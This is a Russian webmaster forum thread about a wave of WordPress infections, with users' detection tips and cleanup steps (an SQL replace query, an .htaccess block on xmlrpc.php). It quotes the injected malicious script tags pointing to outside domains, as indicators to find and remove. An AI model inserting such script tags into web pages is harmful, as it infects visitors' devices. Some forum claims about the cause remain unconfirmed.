X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Массовое заражение. Вирус. Проверьте свои сайты на ВордПресс.
LeZ
LeZ
Topic Starter сообщение 6.12.2015, 19:10; Ответить: LeZ
Сообщение #1


Бывалый
****


Группа: Banned
Сообщений: 283
Регистрация: 24.11.2014
Поблагодарили: 42 раза
Репутация:   5  


В последнее время в Интернет появился вирус на сайтах с ВордПресс. Заражение приняло массовый характер, проверьте свои сайты:

Вирус имеет вид <script src="//youtuibes.com/watch"></script> или <script src="//uptoliked.ru/widjets.js"></script> и ещё дофига вариантов (сам адрес ссылки).

Что делает вирус?

Заражает смартфоны на андроид.

Куда цепляется:

Цепляется к тексту статьи, рандомно, в разных местах.

Как проверить:

Открываете на сайте статью, любую, нажимаете правую кнопку мыши-"исходный код", и смотрите визуально текст статьи, нет ли там такой гадости.

*****************************

Решение проблемы от форумчан:

SeoKot

Решение проблемы с удалением скрипта _wollses.com/steps:
1. В phpmyadmin выполнить запрос
Код
UPDATE wp_posts
SET post_content = REPLACE (post_content, '<script src="//wollses.com/steps"></script>', '')

2. Добавляем в файл .htaccess
Код
<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>


duoseo

1. Проверить заражен ли ваш сайт можно: заходите в раздел все записи, в окошке поиска записей задаете запрос "<script" и щелкаете искать. Если почти все ваши статьи выдались как "результаты поиска", значит вирус есть. Если конечно у вас руками внутри текста статей не вставлены какие-то скрипты.

2. Удалить массово во всех записях можно при помощи плагина Search Regex - заменяете вредоносную строчку на ничего, проблема пропадает. ВРЕМЕННО. Наблюдаю аналогичную ситуацию с июля этого года. Зараза заново появляется через 1,5-2 недели после чистки. Проверяли сайты уже разные люди, дыр не выявили. Проблема явно в самом движке ВП. Думаю что решение кроется в будущих обновлениях движка. На моих сайтах стоят последние версии ВП, проблема не пропала.

Сообщение отредактировал jack - 9.12.2015, 1:39


Поблагодарили: (3)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rom_4
rom_4
сообщение 6.12.2015, 19:14; Ответить: rom_4
Сообщение #2


трафа много не бывает
******

Группа: Active User
Сообщений: 1448
Регистрация: 9.7.2010
Из: Россия
Поблагодарили: 551 раз
Репутация:   62  


Цитата(LeZ @ 6.12.2015, 18:10) *
Как проверить:

Открываете на сайте статью, любую, нажимаете правую кнопку мыши-"исходный код", и смотрите визуально текст статьи, нет ли там такой гадости.

Надеюсь это шутка?


--------------------
Зарабатываю тут, тут и тут


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 6.12.2015, 19:39; Ответить: kagtus
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


Цитата
Заражение приняло массовый характер

подтверждение???


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeoKot
SeoKot
сообщение 6.12.2015, 21:31; Ответить: SeoKot
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 1738
Регистрация: 25.9.2012
Из: Украины
Поблагодарили: 842 раза
Репутация:   102  


Нашел только что на одном из сайтов на главной странице в коде текста _script src="//___wollses.com/steps"></script> перед закрывающимся </p>

Как лечить данную заразу?

Данный скрипт во всех страницах, в записях чисто.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LeZ
LeZ
Topic Starter сообщение 6.12.2015, 23:13; Ответить: LeZ
Сообщение #5


Бывалый
****


Группа: Banned
Сообщений: 283
Регистрация: 24.11.2014
Поблагодарили: 42 раза
Репутация:   5  


Цитата(kagtus @ 6.12.2015, 19:39) *
подтверждение?


https://www.google.ru/search?hl=ru&sour...0.0.4JPiKJkH_us

Цитата(SeoKot @ 6.12.2015, 21:31) *
Как лечить данную заразу?


Я 3 штуки отдал прогеру он вылечил мне на одном сайте и объяснил как лечить на других. Остальные 2 сайта я сам вылечил и дыру закрыл. Вылечить мало, надо и дыру закрыть, иначе снова зальёт у меня так было на 2х сайтах.

Цитата(SeoKot @ 6.12.2015, 21:31) *
Данный скрипт во всех страницах, в записях чисто.


Да на всех, которые записи.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeoKot
SeoKot
сообщение 6.12.2015, 23:35; Ответить: SeoKot
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 1738
Регистрация: 25.9.2012
Из: Украины
Поблагодарили: 842 раза
Репутация:   102  


Цитата(LeZ)
Вылечить мало, надо и дыру закрыть, иначе снова зальёт у меня так было на 2х сайтах.

Ну так делитесь, зачем интригу создаете.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rom_4
rom_4
сообщение 6.12.2015, 23:44; Ответить: rom_4
Сообщение #7


трафа много не бывает
******

Группа: Active User
Сообщений: 1448
Регистрация: 9.7.2010
Из: Россия
Поблагодарили: 551 раз
Репутация:   62  


Как понять, сайт чистый или нет? Думаю, всем понятно, что проверять каждую запись это смешно. Конечно если у вас не одностраничник.
Вот мне интересно, если сайт заражен - в стате можно это отследить? Например по параметру переходы на другие сайты с моего? Понятно, что есть всегда левые переходы из-за зараженных браузеров, но там картина ясная. А вот если этот код - стата покажет левые редиректы на левые сайты? Кто в курсе?


--------------------
Зарабатываю тут, тут и тут
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LeZ
LeZ
Topic Starter сообщение 6.12.2015, 23:54; Ответить: LeZ
Сообщение #8


Бывалый
****


Группа: Banned
Сообщений: 283
Регистрация: 24.11.2014
Поблагодарили: 42 раза
Репутация:   5  


Цитата(SeoKot @ 6.12.2015, 23:35) *
Ну так делитесь, зачем интригу создаете.


Я и так поделился, создал тему. Сами вы не вылечите знания хорошее БД надо и PHP.

Цитата(rom_4 @ 6.12.2015, 23:44) *
Как понять, сайт чистый или нет? Думаю, всем понятно, что проверять каждую запись это смешно. Конечно если у вас не одностраничник.
Вот мне интересно, если сайт заражен - в стате можно это отследить? Например по параметру переходы на другие сайты с моего? Понятно, что есть всегда левые переходы из-за зараженных браузеров, но там картина ясная. А вот если этот код - стата покажет левые редиректы на левые сайты? Кто в курсе?


Конкретно это вирус сидит почти во всех статьях. У меня из 810 статей 780 были заражены. Достаточно рандомно посмотреть статьи 2-3 и будет понятно.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeoKot
SeoKot
сообщение 7.12.2015, 0:15; Ответить: SeoKot
Сообщение #9


Старожил
******

Группа: Active User
Сообщений: 1738
Регистрация: 25.9.2012
Из: Украины
Поблагодарили: 842 раза
Репутация:   102  


Цитата(rom_4)
Как понять, сайт чистый или нет?

Xenu's показывает с каких страниц идут, как массово удалить надо покумекать, а вот без закрытия дыры это сотрясение воздуха.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bibika
bibika
сообщение 7.12.2015, 8:38; Ответить: bibika
Сообщение #10


Завсегдатай
*****

Группа: Active User
Сообщений: 579
Регистрация: 23.7.2012
Из: Львов
Поблагодарили: 148 раз
Репутация:   12  


Цитата
Как понять, сайт чистый или нет?


ПС пришлют уведомление, что сайт заражен.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Требуется почистить сайты от вирусов
6 Mukis 305 Вчера, 15:40
автор: qpPeW
Открытая тема (нет новых ответов) Продам сайты в ГГЛ + мира + ротапост
тиц 10-40
22 xline 2368 Вчера, 12:55
автор: genjnat
Открытая тема (нет новых ответов) Посоветуйте видеогалерею для вордпресс на русском
1 aleggator 523 9.12.2017, 15:39
автор: Nell
Открытая тема (нет новых ответов) ClickDealer- свои люди на рынке буржа!
8 ClickDealer 1274 8.12.2017, 19:51
автор: ClickDealer
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
277 kaartes 102469 7.12.2017, 9:55
автор: Tootkin


 



RSS Текстовая версия Сейчас: 11.12.2017, 15:18
Дизайн